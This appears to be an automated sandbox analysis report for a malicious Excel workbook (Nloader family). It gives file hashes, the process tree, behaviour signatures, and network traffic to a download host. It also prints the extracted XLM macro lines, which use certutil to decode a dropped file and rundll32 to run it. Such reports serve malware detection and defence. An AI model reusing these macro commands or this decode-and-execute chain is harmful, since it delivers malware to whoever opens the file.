Overview

overview

10

Static

static

8

subscripti...3.xlsb

windows7_x64

10

subscripti...3.xlsb

windows10_x64

10

Analysis

  • max time kernel
    116s
  • max time network
    11s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    13/04/2021, 21:04 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    subscription_1617056233.xlsb

  • Size

    177KB

  • MD5

    1d1ba411ff36cdd1b1350341624ac008

  • SHA1

    becdec14b92c6d67b3aa28fdbf4293dabb7b0055

  • SHA256

    ae6dbc08e0e21b217352175f916cfd5269c4fd8d5de6bff2d0a93a366f78e8d1

  • SHA512

    89a9df6e41300e05c71af3eb45acd7cd6c3915bc511d00cc2a420c5d3a274a704798b3e48e93ffccd7813ee2a25e96a2c1c1f4d1e84ed86c144f2e79af501ef0

Score
10/10
nloaderloader

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("Kernel32", "WinExec", "CJ", "cmd.exe /c certutil -decode %PUBLIC%\4123.xsg %PUBLIC%\4123.do1", 0)
2
=CALL("Kernel32", "WinExec", "CJ", "rundll32 C:\Users\Public\4123.do1,DF1", 0)

Signatures

  • Nloader

    Simple loader that includes the keyword 'campo' in the URL used to download other families.

    loadernloader
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Nloader Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\subscription_1617056233.xlsb
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c certutil -decode %PUBLIC%\4123.xsg %PUBLIC%\4123.do1
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1232
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode C:\Users\Public\4123.xsg C:\Users\Public\4123.do1
        3⤵
          PID:1228
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32 C:\Users\Public\4123.do1,DF1
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:1820

    Network

    • flag-unknown
      DNS
      veso2.xyz
      rundll32.exe
      Remote address:
      8.8.8.8:53
      Request
      veso2.xyz
      IN A
      Response
      veso2.xyz
      IN A
      198.54.117.244
    • flag-unknown
      POST
      http://veso2.xyz/campo/r/r1
      rundll32.exe
      Remote address:
      198.54.117.244:80
      Request
      POST /campo/r/r1 HTTP/1.1
      Host: veso2.xyz
      Pragma: no-cache
      Content-Length: 4
    • 198.54.117.244:80
      http://veso2.xyz/campo/r/r1
      http
      rundll32.exe
      225 B
       132 B
       3
      3

      HTTP Request

      POST http://veso2.xyz/campo/r/r1
    • 8.8.8.8:53
      veso2.xyz
      dns
      rundll32.exe
      55 B
       71 B
       1
      1

      DNS Request

      veso2.xyz

      DNS Response

      198.54.117.244

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/788-61-0x0000000071391000-0x0000000071393000-memory.dmp

      Filesize

      8KB

      Download

    • memory/788-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/788-80-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/788-60-0x000000002F7D1000-0x000000002F7D4000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1228-65-0x0000000075551000-0x0000000075553000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1820-71-0x0000000000200000-0x0000000000209000-memory.dmp

      Filesize

      36KB

      Download

    • memory/1820-74-0x0000000000210000-0x0000000000217000-memory.dmp

      Filesize

      28KB

      Download

    • memory/1820-76-0x0000000000213000-0x0000000000214000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1820-77-0x0000000000230000-0x0000000000235000-memory.dmp

      Filesize

      20KB

      Download

    • memory/1820-79-0x0000000000160000-0x0000000000166000-memory.dmp

      Filesize

      24KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.